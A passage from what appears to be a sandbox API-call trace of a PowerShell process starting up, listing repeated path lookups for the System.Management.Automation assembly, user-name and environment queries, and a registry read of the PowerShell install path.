lpFileInformation=0xae2dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.096] GetLastError () returned 0xcb [0077.096] SetErrorMode (uMode=0x1) returned 0x1 [0077.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xade70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.096] GetLastError () returned 0xcb [0077.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\.", nBufferLength=0x105, lpBuffer=0xade0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.096] GetLastError () returned 0xcb [0077.100] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xadf2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.100] GetLastError () returned 0xcb [0077.100] SetErrorMode (uMode=0x1) returned 0x1 [0077.100] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0x33a6240 | out: lpFileInformation=0x33a6240*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.100] GetLastError () returned 0xcb [0077.100] SetErrorMode (uMode=0x1) returned 0x1 [0077.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.101] GetLastError () returned 0xcb [0077.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.101] GetLastError () returned 0xcb [0077.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.101] GetLastError () returned 0xcb [0077.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.101] GetLastError () returned 0xcb [0077.126] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae4c8) returned 0x1 [0077.126] GetLastError () returned 0xcb [0077.126] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae4d0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae4d0) returned 1 [0077.128] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33be340*="Available", lpRawData=0x33be1fc) returned 1 [0077.128] GetLastError () returned 0x0 [0077.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.129] GetLastError () returned 0xcb [0077.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.130] GetLastError () returned 0xcb [0077.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadfa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.153] GetLastError () returned 0xcb [0077.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.153] GetLastError () returned 0xcb [0077.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.153] GetLastError () returned 0xcb [0077.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.156] GetLastError () returned 0xcb [0077.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.156] GetLastError () returned 0xcb [0077.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.156] GetLastError () returned 0xcb [0077.157] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0077.157] GetLastError () returned 0xcb [0077.157] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0077.157] GetLastError () returned 0xcb [0077.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.157] GetLastError () returned 0xcb [0077.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.157] GetLastError () returned 0xcb [0077.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.157] GetLastError () returned 0xcb [0077.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.157] GetLastError () returned 0xcb [0077.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.157] GetLastError () returned 0xcb [0077.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.157] GetLastError () returned 0xcb [0077.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.158] GetLastError () returned 0xcb [0077.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.158] GetLastError () returned 0xcb [0077.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.158] GetLastError () returned 0xcb [0077.158] GetCurrentProcessId () returned 0x688 [0077.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.158] GetLastError () returned 0xcb [0077.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.158] GetLastError () returned 0xcb [0077.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.158] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.159] GetLastError () returned 0xcb [0077.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.160] GetLastError () returned 0xcb [0077.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae45c | out: phkResult=0xae45c*=0x3b8) returned 0x0 [0077.160] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae4a4, lpData=0x0, lpcbData=0xae4a0*=0x0 | out: lpType=0xae4a4*=0x1, lpData=0x0, lpcbData=0xae4a0*=0x56) returned 0x0 [0077.160] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae4a4, lpData=0x54b630, lpcbData=0xae4a0*=0x56 | out: lpType=0xae4a4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae4a0*=0x56) returned 0x0 [0077.160] RegCloseKey (hKey=0x3b8) returned 0x0 [0077.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.160] GetLastError () returned 0xcb [0077.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.160] GetLastError () returned 0xcb [0077.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadefc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.160] GetLastError () returned 0xcb [0077.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.161] GetLastError () returned 0xcb [0077.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.161] GetLastError () returned 0xcb [0077.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.161] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.168] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.169] GetLastError () returned 0xcb [0077.169] GetFullPathNameW (in: 